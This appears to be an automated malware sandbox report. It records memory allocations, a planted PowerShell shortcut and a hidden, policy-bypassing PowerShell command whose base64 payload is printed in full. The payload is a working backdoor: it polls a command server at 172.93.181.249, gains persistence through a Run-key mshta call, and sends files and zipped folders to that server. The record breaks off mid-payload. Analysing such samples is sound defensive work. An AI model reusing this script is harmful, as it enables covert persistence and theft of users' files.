NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ad9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ada000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04add000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04ade000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04adf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 1, 2023, 7:53 p.m.	process_identifier: 2200 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04be1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA0ADsAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAAgAD0AIAAxADAAMgA0ACAAKgAgADEAMAAyADQAOwAkAEUAVgBQACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAA9ACAAJwBoAHQAdABwADoALwAvADEANwAyAC4AOQAzAC4AMQA4ADEALgAyADQAOQAvAGMAbwBuAHQAcgBvAGwALwBjAG8AbQAuAHAAaABwACcAIAArACAAJwA/AFUAPQAnACAAKwAgACQARQBWAFAAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAEMATABQAFQATQBkAEcAdgBpAE8ASABmAFQATAAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIAAtAE4AYQBtAGUAIABKAFEAUQB3AEUAIAAtAFYAYQBsAHUAZQAgACcAYwA6AFwAdwBpAG4AZABvAHcAcwBcAHMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAIAAvAGMAIABQAG8AdwBlAHIAUwBoAGUAbABsAC4AZQB4AGUAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8ATABvAGcAbwAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBlAHAAIABiAHkAcABhAHMAcwAgAHAAaQBuAGcAIAAtAG4AIAAxACAALQB3ACAANAA3ADQANAA2ADUAIAAyAC4AMgAuADIALgAyACAAfAB8ACAAbQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADcAMgAuADkAMwAuADEAOAAxAC4AMgA0ADkALwBjAG8AbgB0AHIAbwBsAC8AaAB0AG0AbAAvADEALgBoAHQAbQBsACcAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7AH0AZgB1AG4AYwB0AGkAbwBuACAAZgBwAEIAYgAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJABsAG8AbwBBAE0ASQBtAEkASwApAHsAJABUAEEAQwBLAHMAWABWAE4AcwBTACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAGwAbwBvAEEATQBJAG0ASQBLACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEMAbwBuAHQAZQBuAHQATABlAG4AZwB0AGgAIAA9ACAAJABUAEEAQwBLAHMAWABWAE4AcwBTAC4ATABlAG4AZwB0AGgAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAFQAQQBDAEsAcwBYAFYATgBzAFMALAAgADAALAAgACQAVABBAEMASwBzAFgAVgBOAHMAUwAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwByAGUAdAB1AHIAbgAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAdgBTAGwAbwBiAFYAbAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYALAAgACQARABiAEMALAAgACQAeABQAGIAdwBqAHQAUwBhAHAAVABJAEIAKQB7ACQAVABpAG0AZQBvAHUAdAA9ADEAMAAwADAAMAAwADAAMAA7ACQAQwBSAEwARgAgAD0AIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEQAKQAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAwAEEAKQA7ACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgAD0AIAAnAC0ALQAnADsAJABCAG8AdQBuAGQAYQByAHkAIAA9ACAAJwAqACoAKgAqACoAJwA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoATwBwAGUAbgBSAGUAYQBkACgAJAByAE8AdQBNAEYAKQA7ACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAGIAeQB0AGUAWwBdACAAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQwBWAFIAcQB3AHUAZgBBAGQAQwBOAHEALAAwACwAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAApACkAewBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAFQAaQBtAGUAbwB1AHQAIAA9ACAAJABUAGkAbQBlAG8AdQB0ADsAJABnAFIATABRAGEAdABHAG8AaQBpAGYAZABVAFQALgBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAA9ACAAJwBtAHUAbAB0AGkAcABhAHIAdAAvAGYAbwByAG0ALQBkAGEAdABhADsAYgBvAHUAbgBkAGEAcgB5AD0AJwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVACAAPQAgACQAZwBSAEwAUQBhAHQARwBvAGkAaQBmAGQAVQBUAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAGgAZQBhAGQAaQBuAGcAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAQwBSAEwARgApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQARABiAEMAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AFAAYgB3AGoAdABTAGEAcABUAEkAQgAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADMALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAzAC4ATABlAG4AZwB0AGgAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABDAFYAUgBxAHcAdQBmAEEAZABDAE4AcQAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9ACQAcwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABoAFUAYgBVAFcAawBaAGIAWAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAcgBPAHUATQBGACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAAPQAgAGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACcAJwA7AEkAZgAgACgAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAIAAtAG4AZQAgACcAJwApAHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAD0AJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEALgBMAGUAbgBnAHQAaAAgAC0AIAAyACkAOwAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAKQApADsAaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACkAewBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAKQB7ACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUAAgACsAIAAnAC4AYwBzAHYAJwA7AEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQACAAKwAgACcALgB6AGkAcAAnADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGQAaQByACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAPQAgACcAXwBmAGkAbABlACcAOwAkAG4AbwB3AHQAaQBtAGUAIAA9ACAARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkALQBNAE0